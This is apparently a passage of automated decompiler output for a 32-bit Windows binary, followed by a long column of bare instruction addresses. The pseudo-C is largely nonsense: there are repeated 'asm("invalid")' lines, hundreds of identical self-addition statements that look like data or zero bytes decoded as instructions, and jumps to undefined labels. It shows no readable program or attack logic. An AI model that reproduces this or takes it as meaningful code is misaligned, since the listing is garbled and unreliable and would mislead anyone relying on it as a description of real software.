					asm("invalid");
					 *_t185 =  *_t185 + 1;
					 *_t185 =  *_t185 + _t185;
					 *((intOrPtr*)(_t185 + 0x8004016)) =  *((intOrPtr*)(_t185 + 0x8004016)) + _t195;
					_t120 = _t185 + 2;
					 *_t120 =  *_t120 + _t120;
					 *_t120 =  *_t120 + _t120;
					 *((intOrPtr*)(_t120 + 0x6d57d)) =  *((intOrPtr*)(_t120 + 0x6d57d)) + _t187;
					 *_t120 =  *_t120 + _t120;
					 *_t120 =  *_t120 + _t120;
					 *_t120 =  *_t120 + _t120;
				}
				 *_t120 =  *_t120 + _t120;
				 *_t120 =  *_t120 + _t120;
				 *_t120 =  *_t120 + _t120;
				_t121 = _t120 + 1;
				 *_t194 =  *_t194 + _t121;
				 *_t194 =  *_t194 + _t121;
				 *((intOrPtr*)(_t200 + _t195 + 0x40)) =  *((intOrPtr*)(_t200 + _t195 + 0x40)) + _t187;
				 *_t121 =  *_t121 + _t121;
				 *_t121 =  *_t121 + _t121;
				_t188 = _t187 + _t187;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t121 =  *_t121 + 1;
				 *_t121 =  *_t121 + _t121;
				_t123 = _t121 + _t121 + 1;
				 *_t123 =  *_t123 + _t188;
				_t125 = _t123 + 2;
				 *_t197 =  *_t197 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *((intOrPtr*)(_t125 + 0x13)) =  *((intOrPtr*)(_t125 + 0x13)) + _t195;
				_t126 = _t125 + 1;
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				 *((intOrPtr*)(_t126 + 0x13)) =  *((intOrPtr*)(_t126 + 0x13)) + _t195;
				_t127 = _t126 + 1;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t188 =  *_t188 + _t127;
				 *_t205 =  *_t205 + _t195;
				if ( *_t205 >= 0) goto L4;
				 *[gs:edx] =  *[gs:edx] + _t195;
				if ( *[gs:edx] >= 0) goto L5;
				_t210 = ss;
				 *_t194 =  *_t194 + _t127;
				 *[fs:ebp] =  *[fs:ebp] + _t194;
				_push(_t200);
				_t196 = _t195 + 1;
				_t128 = _t127 ^ 0x2a1ff021;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				 *_t200 =  *_t200 + _t188;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				_t129 = _t128 |  *_t128;
				 *(_t129 + _t129) =  *(_t129 + _t129) | _t129;
				 *_t129 =  *_t129 + _t129;
				 *_t129 =  *_t129 + _t129;
				 *((intOrPtr*)(_t129 + 0x1c)) =  *((intOrPtr*)(_t129 + 0x1c)) + _t129;
				_t130 = _t129 + 1;
				 *_t130 =  *_t130 + _t130;
				asm("adc al, 0x40");
				 *_t130 =  *_t130 + _t130;
				asm("lock xor [eax], al");
				_t189 = _t188 + _t188;
				asm("invalid");
				 *_t130 =  *_t130 | _t130;
				 *_t130 =  *_t130 + _t130;
				 *_t130 =  *_t130 + _t130;
				 *_t130 =  *_t130 + _t130;
				 *_t130 =  *_t130 + _t130;
				 *_t130 =  *_t130 + _t130;
				goto 0xc84013d9;
				asm("adc al, [eax]");
				asm("enter 0x4012, 0x0");
				_t131 = _t130 + 1;
				 *_t131 =  *_t131 + _t189;
				 *_t131 =  *_t131 + _t131;
				if ( *_t131 > 0) goto L6;
				 *_t131 =  *_t131 + _t131;
				 *_t131 = _t131;
				 *_t131 =  *_t131 + _t131;
				_t132 =  *_t131;
				 *_t132 =  *_t132 + _t132;
				 *_t132 =  *_t132 + _t132;
				 *_t132 =  *_t132 + _t132;
				 *_t132 =  *_t132 + _t132;
				 *_t132 =  *_t132 + _t132;
				 *_t132 =  *_t132 + _t132;
				 *_t132 =  *_t132 + _t132;
				 *_t132 =  *_t132 + _t132;
				 *_t132 =  *_t132 + _t132;
				_push(_t132);
				if( *_t132 < 0) {
					L15:
					if (_t230 < 0) goto L16;
					_pop(_t211);
					 *_t194 =  *_t194 + _t132;
					 *_t132 =  *_t132 & _t132;
					_t210 = _t211 - 1;
					 *_t197 =  *_t197 + _t194;
					_t231 =  *_t197;
					if (_t231 == 0) goto L17;
					if (_t231 == 0) goto L18;
					asm("popad");
					L19:
					 *_t132 =  *_t132 + _t132;
					 *_t200 =  *_t200 + _t194;
					asm("outsd");
					 *_t196 = _t196 +  *_t196;
					 *_t132 = _t196 +  *_t132;
					 *_t197 =  *_t197 + _t196;
					L20:
					asm("aaa");
					 *0x36003800 =  *0x36003800 + _t196;
					 *_t197 =  *_t197 + _t196;
					 *_t196 = _t196 +  *_t196;
					 *_t132 = _t196 +  *_t132;
					 *((intOrPtr*)(_t132 + _t132 + 0x41)) =  *((intOrPtr*)(_t132 + _t132 + 0x41)) + _t189;
					 *_t132 =  *_t132 + _t132;
					 *((intOrPtr*)(_t132 + _t132 + 0x6f)) =  *((intOrPtr*)(_t132 + _t132 + 0x6f)) + _t194;
					 *((intOrPtr*)(_t132 + _t132 + 0x74)) =  *((intOrPtr*)(_t132 + _t132 + 0x74)) + _t196;
					 *_t194 =  *_t194 + _t132;
					 *_t132 =  *_t132 & _t132;
					_t201 = _t200 - 1;
					 *_t197 =  *_t197 + _t194;
					_t133 = _t132 ^  *_t132;
					 *_t133 =  *_t133 ^ _t133;
					asm("aaa");
					 *0x36003800 =  *0x36003800 + _t196;
					 *_t197 =  *_t197 + _t196;
					 *_t196 = _t196 +  *_t196;
					 *_t133 = _t196 +  *_t133;
					 *_t133 = _t196 +  *_t133;
					 *_t194 = _t196 +  *_t194;
					 *_t133 =  *_t133 + _t133;
					 *_t133 = _t196 +  *_t133;
					 *_t133 =  *_t133 & _t133;
					_t137 = _t133 + 0x122;
					 *_t196 = _t196 +  *_t196;
					 *((intOrPtr*)(_t137 + _t137 + 0x65)) =  *((intOrPtr*)(_t137 + _t137 + 0x65)) + _t196;
					 *_t137 =  *_t137 + _t189;
					_t234 =  *_t137;
					if (_t234 == 0) goto L21;
					if (_t234 != 0) goto L22;
					if (_t234 < 0) goto L23;
					 *[gs:esi] =  *[gs:esi] + _t194;
					 *_t201 =  *_t201 + _t196;
					asm("bound eax, [eax]");
					if ( *_t201 < 0) goto L24;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					asm("enter 0x4012, 0x0");
					es = _t196;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t189;
					_t139 = _t137 + 2;
					 *_t139 =  *_t139 + _t139;
					asm("sbb al, 0x40");
					asm("invalid");
					 *_t139 =  *_t139 + 1;
					 *_t139 =  *_t139 + _t139;
					 *_t139 =  *_t139 + _t194;
					 *((intOrPtr*)(_t201 - 0x4cdab710)) =  *((intOrPtr*)(_t201 - 0x4cdab710)) + _t194;
					asm("insd");
					_t198 = _t197 + 1;
					_t191 = _t139 + 2;
					asm("movsb");
					_t143 = _t189 + _t189 ^ _t191;
					 *((char*)(_t194 + _t191 + 0x2000a25)) =  *((char*)(_t194 + _t191 + 0x2000a25)) - 1;
					 *_t196 =  *_t196 + _t143;
					 *_t196 =  *_t196 + _t143;
					 *((intOrPtr*)(_t143 + 0x4016)) =  *((intOrPtr*)(_t143 + 0x4016)) + _t196;
					 *_t143 =  *_t143 + _t143;
					 *_t143 =  *_t143 + _t143;
					 *_t143 =  *_t143 + _t143;
					 *_t143 =  *_t143 + _t143;
					 *_t143 =  *_t143 + _t143;
					 *_t143 =  *_t143 + _t143;
					ss = _t194;
					 *_t194 =  *_t194 + _t194;
					 *_t194 =  *_t194 + _t191;
					_t146 = _t143 + 1;
					 *_t146 =  *_t146 + _t146;
					 *_t146 =  *_t146 + _t146;
					 *_t196 =  *_t196 + _t146;
					 *_t146 =  *_t146 + _t146;
					 *_t146 =  *_t146 + _t146;
					asm("adc eax, [eax]");
					asm("invalid");
					asm("invalid");
					_t148 = _t146 - 0x17 + 1;
					 *_t148 =  *_t148 + _t148;
					 *_t148 =  *_t148 + _t148;
					 *_t148 =  *_t148 + _t196;
					_t150 = _t148 + 2;
					 *_t150 =  *_t150 + _t150;
					 *_t150 =  *_t150 + _t150;
					 *_t150 =  *_t150 + _t196;
					_pop(ss);
					_t151 = _t150 + 1;
					 *_t194 =  *_t194 + _t151;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + 1;
					 *_t194 =  *_t194 + _t151;
					 *_t194 =  *_t194;
					 *_t151 =  *_t151 + _t151;
					 *_t151 =  *_t151 + _t151;
					_t152 = _t151 + 1;
					_t193 = _t191 + _t191 + _t191 + _t191;
					asm("invalid");
					 *((intOrPtr*)(_t193 + 0x40 + _t194)) =  *((intOrPtr*)(_t193 + 0x40 + _t194)) + 1;
					 *_t152 =  *_t152 + _t152;
					 *_t152 =  *_t152 + _t152;
					 *_t152 =  *_t152 + _t152;
					_t154 = _t152 + 2;
					 *_t154 =  *_t154 + _t154;
					 *_t154 =  *_t154 + _t154;
					 *_t154 =  *_t154 + _t193;
					_pop(ss);
					_t155 = _t154 + 1;
					 *((intOrPtr*)(_t155 + _t155)) =  *((intOrPtr*)(_t155 + _t155)) + _t193;
					 *_t155 =  *_t155 + _t155;
					 *_t155 =  *_t155 + _t155;
					 *_t155 =  *_t155 + _t155;
					asm("invalid");
					 *_t155 =  *_t155 + _t155;
					 *((intOrPtr*)(_t155 + 1)) =  *((intOrPtr*)(_t155 + 1)) + _t155;
					 *_t155 =  *_t155 + _t155;
					_t206 = _t205 - 1;
					asm("outsd");
					if(_t206 != 0) {
						L35:
						_t156 = _t155;
						if(_t156 == 0) {
							_push(0x401764);
							L38:
							_pop(ss);
							_t157 = _t156 + 1;
							 *((intOrPtr*)(_t157 + 0x4011d0)) =  *((intOrPtr*)(_t157 + 0x4011d0)) + _t193;
							_t158 =  *_t157();
							goto __eax;
						}
						goto __eax;
					}
					_t156 = _t155 ^  *[gs:eax];
					_t206 = _t206 - 1;
					asm("outsd");
					if(_t206 != 0) {
						goto L38;
					}
					 *[gs:eax] =  *[gs:eax] ^ _t156;
					_t239 =  *[gs:eax];
					_push(_t196);
					_push(_t196);
					_push(_t210);
					if(_t239 < 0 || _t239 != 0) {
						 *_t158 =  *_t158 + _t158;
						_t246 =  *_t158;
						_push(_t196);
						asm("a16 push ebx");
						if (_t246 == 0) goto L53;
						goto L40;
					} else {
						 *[gs:eax] =  *[gs:eax] + _t156;
						 *((intOrPtr*)(_t156 + _t156)) =  *((intOrPtr*)(_t156 + _t156)) + _t194;
						 *_t156 =  *_t156 | _t156;
						 *_t156 =  *_t156 + _t156;
						 *_t156 =  *_t156 + _t156;
						 *_t156 =  *_t156 + _t156;
						 *_t156 =  *_t156 + _t156;
						_t158 = _t156 | 0x61000000;
						_t240 = _t158;
						if(_t240 <= 0) {
							L40:
							if(_t246 == 0) {
								L53:
								 *((intOrPtr*)(_t158 + _t158)) =  *((intOrPtr*)(_t158 + _t158)) + _t158;
								_t193 = _t193 + 1;
								_t160 = _t158 - 1 + 1;
								 *_t160 =  *_t160 + _t160;
								 *_t160 =  *_t160 + _t160;
								 *_t160 =  *_t160 + _t160;
								 *_t160 =  *_t160 + _t160;
								 *((intOrPtr*)(0x404350 + _t194)) =  *((intOrPtr*)(0x404350 + _t194)) + _t160;
								_t158 =  *0x404350; // 0x0
								L55:
								 *_t193 =  *_t193 + _t194;
								 *(_t196 + _t158 - 1) =  *(_t196 + _t158 - 1) << 0xe0;
							}
							asm("popad");
							asm("insb");
							if(_t246 != 0) {
								goto L55;
							}
							if(_t206 + 1 < 0) {
								_t193 = _t193 - 1;
								if (_t193 >= 0) goto L52;
								_pop(ss);
								_t158 = _t158 + 1 + _t158 + 1 + 1;
								 *_t158 =  *_t158 + _t158;
								goto L53;
							}
							 *_t158 =  *_t158 + _t158;
							L44:
							 *((intOrPtr*)(_t198 + _t196)) =  *((intOrPtr*)(_t198 + _t196)) + _t193;
							 *((intOrPtr*)(_t198 +  &(_t196[0x10]))) =  *((intOrPtr*)(_t198 +  &(_t196[0x10]))) + _t193;
							_t167 = _t158 + 2;
							L45:
							 *_t167 =  *_t167 + _t167;
							 *_t167 =  *_t167 + _t167;
							 *_t167 =  *_t167 + _t167;
							 *_t167 =  *_t167 + _t167;
							L46:
							 *_t167 =  *_t167 + _t167;
							_t168 =  *0x404344; // 0x0
							_t169 = _t168;
							if(_t169 == 0) {
								_push(0x4017ac);
								L50:
								_pop(ss);
								_t170 = _t169 + 1;
								 *((intOrPtr*)(_t170 + 0x4011d0)) =  *((intOrPtr*)(_t170 + 0x4011d0)) + _t193;
								_t158 =  *_t170();
								goto __eax;
							}
							goto __eax;
						}
						if(_t240 < 0) {
							goto L44;
						}
						_t202 = _t201 ^  *_t196;
						asm("fs insb");
						asm("insb");
						 *_t158 =  *_t158 + _t158;
						 *_t158 =  *_t158 + _t158;
						asm("adc [eax], eax");
						 *_t158 =  *_t158 + _t158;
						_t241 =  *_t158;
						_push(_t196);
						asm("a16 push ecx");
						if(_t241 != 0) {
							goto L45;
						}
						if(_t241 < 0) {
							goto L50;
						}
						_push(_t202);
						asm("popad");
						asm("insb");
						if(_t241 != 0) {
							goto L46;
						}
						_t206 = _t206 + 1;
						if(_t206 < 0) {
							goto L40;
						}
						 *_t158 =  *_t158 + _t158;
						 *_t158 =  *_t158 + _t158;
						_t171 = _t158 + 1;
						 *((intOrPtr*)(_t171 + 0x17)) =  *((intOrPtr*)(_t171 + 0x17)) + _t196;
						_t155 = _t171 + 1;
						 *_t155 =  *_t155 + _t155;
						 *((intOrPtr*)(_t155 + _t155)) =  *((intOrPtr*)(_t155 + _t155)) + _t155;
						 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ _t155;
						 *_t155 =  *_t155 + _t155;
						 *_t155 =  *_t155 + _t155;
						 *_t155 =  *_t155 + _t155;
						 *_t155 =  *_t155 + _t155;
						 *((intOrPtr*)(_t194 + 0x404338)) =  *((intOrPtr*)(_t194 + 0x404338)) + _t155;
						goto L35;
					}
				}
				_t205 =  *_t200 * 0x65545252;
				_t224 = _t205;
				if(_t224 < 0 || _t224 != 0) {
					goto L19;
				} else {
					 *[gs:eax] =  *[gs:eax] + _t132;
					_t225 =  *[gs:eax];
					_push(_t196);
					_push(_t196);
					_push(_t210);
					if(_t225 < 0 || _t225 != 0) {
						goto L20;
					} else {
						_t172 = _t196 + _t132;
						 *_t172 =  *_t172 + _t172;
						 *((intOrPtr*)(_t200 +  &(_t196[0x10]))) =  *((intOrPtr*)(_t200 +  &(_t196[0x10]))) + _t189;
						 *_t172 =  *_t172 + _t172;
						 *_t172 =  *_t172 + _t172;
						 *((intOrPtr*)(_t172 + 0x1c)) =  *((intOrPtr*)(_t172 + 0x1c)) + _t196;
						_t173 = _t172 + 1;
						 *((intOrPtr*)(_t173 + 0x2e)) =  *((intOrPtr*)(_t173 + 0x2e)) + _t196;
						_t174 = _t173 + 1;
						 *((intOrPtr*)(_t189 + _t174)) =  *((intOrPtr*)(_t189 + _t174)) + _t189;
						 *_t174 =  *_t174 + _t194;
						_t176 = _t174 + 2;
						_t200[4] = _t200[4] + _t176;
						_t177 = _t176 + 1;
						 *_t177 =  *_t177 + _t177;
						_t179 = _t177 + 2;
						 *_t196 =  *_t196 + _t194;
						 *((intOrPtr*)(_t179 +  &(_t179[0x10]))) =  *((intOrPtr*)(_t179 +  &(_t179[0x10]))) + _t189;
						 *_t189 =  *_t189 + _t179;
						 *_t205 =  *_t205 + _t196;
						if ( *_t205 >= 0) goto L12;
						 *[gs:edx] =  *[gs:edx] + _t196;
						if ( *[gs:edx] >= 0) goto L13;
						 *_t194 = _t179 +  *_t194;
						 *[fs:ebp] =  *[fs:ebp] + _t194;
						_t180 =  *_t179 * 0x5c006e;
						 *_t205 =  *_t205 + _t180;
						if ( *_t205 >= 0) goto L14;
						_t132 =  *_t180 * 0x74;
						 *_t197 =  *_t197 + _t194;
						_t230 =  *_t197;
						goto L15;
					}
				}
			}

0x0040127d
0x00401282
0x00401284
0x00401286
0x00401288
0x0040128a
0x0040128c
0x0040128d
0x0040128f
0x00401291
0x00401293
0x00401297
0x00401298
0x0040129a
0x0040129b
0x0040129c
0x0040129e
0x004012a1
0x004012a4
0x004012a6
0x004012a8
0x004012aa
0x004012ac
0x004012ae
0x004012b0
0x004012b2
0x004012b2
0x004012b4
0x004012b5
0x004012b7
0x004012bc
0x004012bf
0x004012c1
0x004012c3
0x004012c5
0x004012c7
0x004012c9
0x004012cb
0x004012cd
0x004012d0
0x004012d1
0x004012d3
0x004012d5
0x004012d8
0x004012d9
0x004012db
0x004012e1
0x004012e3
0x004012e6
0x004012e7
0x004012e9
0x004012ed
0x004012ee
0x004012ef
0x004012f1
0x004012f3
0x004012fa
0x004012fc
0x004012fe
0x004012ff
0x00401301
0x00401303
0x00401307
0x00401309
0x0040130b
0x0040130d
0x0040130f
0x00401311
0x00401313
0x00401315
0x00401317
0x0040131e
0x0040131f
0x00401321
0x00401323
0x00401329
0x0040132b
0x0040132d
0x0040132d
0x0040132e
0x00401330
0x00401332
0x00401336
0x00401337
0x00401339
0x0040133b
0x0040133f
0x00401341
0x00401343
0x00401345
0x00401347
0x00401349
0x0040134b
0x0040134d
0x00401352
0x00401353
0x00401356
0x00401357
0x00401359
0x0040135b
0x0040135e
0x0040135f
0x00401361
0x00401363
0x00401365
0x00401367
0x00401369
0x0040136b
0x0040136e
0x0040136f
0x00401371
0x00401373
0x00401379
0x0040137c
0x0040137e
0x00401382
0x00401384
0x00401385
0x00401388
0x0040138c
0x0040138d
0x0040138e
0x00401393
0x00401395
0x00401397
0x00401399
0x0040139b
0x0040139d
0x0040139f
0x004013a2
0x004013a4
0x004013a6
0x004013a8
0x004013aa
0x004013ac
0x004013ae
0x004013b0
0x004013b3
0x004013b5
0x004013b7
0x004013ba
0x004013bb
0x004013bd
0x004013bf
0x004013c1
0x004013c4
0x004013c6
0x004013c8
0x004013ca
0x004013cc
0x004013ce
0x004013d0
0x004013d2
0x004013d4
0x004013d9
0x004013dc
0x004013e2
0x004013e3
0x004013e6
0x004013e8
0x004013ea
0x004013ec
0x004013ee
0x004013f0
0x004013f2
0x004013f4
0x004013f6
0x004013f8
0x004013fa
0x004013fc
0x004013fe
0x00401400
0x00401402
0x00401404
0x00401405
0x00401474
0x00401474
0x00401476
0x00401477
0x0040147a
0x0040147c
0x0040147d
0x0040147d
0x00401480
0x00401482
0x00401484
0x00401485
0x00401485
0x00401487
0x0040148a
0x0040148b
0x0040148d
0x0040148f
0x00401490
0x00401490
0x00401491
0x00401497
0x00401499
0x0040149b
0x0040149d
0x004014a1
0x004014a3
0x004014a7
0x004014ab
0x004014ae
0x004014b0
0x004014b1
0x004014b4
0x004014b6
0x004014b8
0x004014b9
0x004014bf
0x004014c1
0x004014c3
0x004014c5
0x004014c7
0x004014c9
0x004014cb
0x004014ce
0x004014d9
0x004014db
0x004014df
0x004014e3
0x004014e3
0x004014e6
0x004014e8
0x004014ea
0x004014ec
0x004014ef
0x004014f2
0x004014f4
0x004014f6
0x004014f8
0x004014fa
0x004014fc
0x004014fe
0x00401500
0x00401502
0x00401504
0x00401506
0x00401508
0x0040150a
0x0040150c
0x0040150e
0x00401510
0x00401512
0x00401514
0x00401516
0x00401518
0x0040151a
0x0040151c
0x0040151e
0x00401520
0x00401522
0x00401524
0x00401526
0x00401528
0x0040152a
0x0040152c
0x0040152e
0x00401530
0x00401532
0x00401534
0x00401536
0x00401538
0x0040153a
0x0040153c
0x0040153e
0x00401540
0x00401542
0x00401544
0x00401546
0x00401548
0x0040154a
0x0040154c
0x0040154e
0x00401550
0x00401552
0x00401554
0x00401556
0x00401558
0x0040155a
0x0040155c
0x0040155e
0x00401560
0x00401562
0x00401564
0x00401566
0x00401568
0x0040156a
0x0040156c
0x0040156e
0x00401570
0x00401572
0x00401574
0x00401576
0x00401578
0x0040157a
0x0040157c
0x0040157e
0x00401580
0x00401582
0x00401584
0x00401586
0x00401588
0x0040158a
0x0040158c
0x0040158e
0x00401590
0x00401592
0x00401594
0x00401596
0x00401598
0x0040159a
0x0040159c
0x0040159e
0x004015a0
0x004015a2
0x004015a4
0x004015a6
0x004015a8
0x004015aa
0x004015ac
0x004015ae
0x004015b0
0x004015b2
0x004015b4
0x004015b6
0x004015b8
0x004015ba
0x004015bc
0x004015be
0x004015c0
0x004015c2
0x004015c4
0x004015c6
0x004015c8
0x004015ca
0x004015cc
0x004015ce
0x004015d0
0x004015d2
0x004015d4
0x004015d6
0x004015d8
0x004015da
0x004015dc
0x004015de
0x004015e0
0x004015e2
0x004015e4
0x004015e6
0x004015e8
0x004015ea
0x004015ec
0x004015ee
0x004015f0
0x004015f2
0x004015f4
0x004015f6
0x004015f8
0x004015fa
0x004015fc
0x004015fe
0x00401600
0x00401602
0x00401604
0x00401606
0x00401608
0x0040160a
0x0040160c
0x0040160e
0x00401610
0x00401612
0x00401614
0x00401616
0x00401618
0x0040161a
0x0040161c
0x0040161e
0x00401620
0x00401622
0x00401624
0x00401626
0x00401628
0x0040162a
0x0040162c
0x0040162e
0x00401630
0x00401632
0x00401634
0x00401636
0x00401638
0x0040163a
0x0040163c
0x0040163e
0x00401640
0x00401642
0x00401644
0x00401646
0x00401648
0x0040164a
0x0040164c
0x0040164e
0x00401650
0x00401652
0x00401654
0x00401658
0x00401659
0x0040165b
0x0040165d
0x0040165f
0x00401662
0x00401663
0x00401665
0x00401669
0x0040166b
0x0040166d
0x0040166f
0x00401673
0x00401679
0x0040167b
0x0040167c
0x0040167d
0x0040167e
0x00401680
0x00401687
0x00401689
0x0040168b
0x00401691
0x00401693
0x00401695
0x00401697
0x00401699
0x0040169b
0x0040169d
0x0040169f
0x004016a3
0x004016a5
0x004016a7
0x004016a9
0x004016ab
0x004016ad
0x004016af
0x004016b1
0x004016b4
0x004016b6
0x004016ba
0x004016bb
0x004016bd
0x004016bf
0x004016c2
0x004016c3
0x004016c5
0x004016c7
0x004016c9
0x004016ca
0x004016cb
0x004016cd
0x004016cf
0x004016d1
0x004016d5
0x004016d7
0x004016d9
0x004016dc
0x004016de
0x004016e2
0x004016e3
0x004016e5
0x004016e7
0x004016eb
0x004016ed
0x004016ef
0x004016f2
0x004016f3
0x004016f5
0x004016f7
0x004016f9
0x004016fa
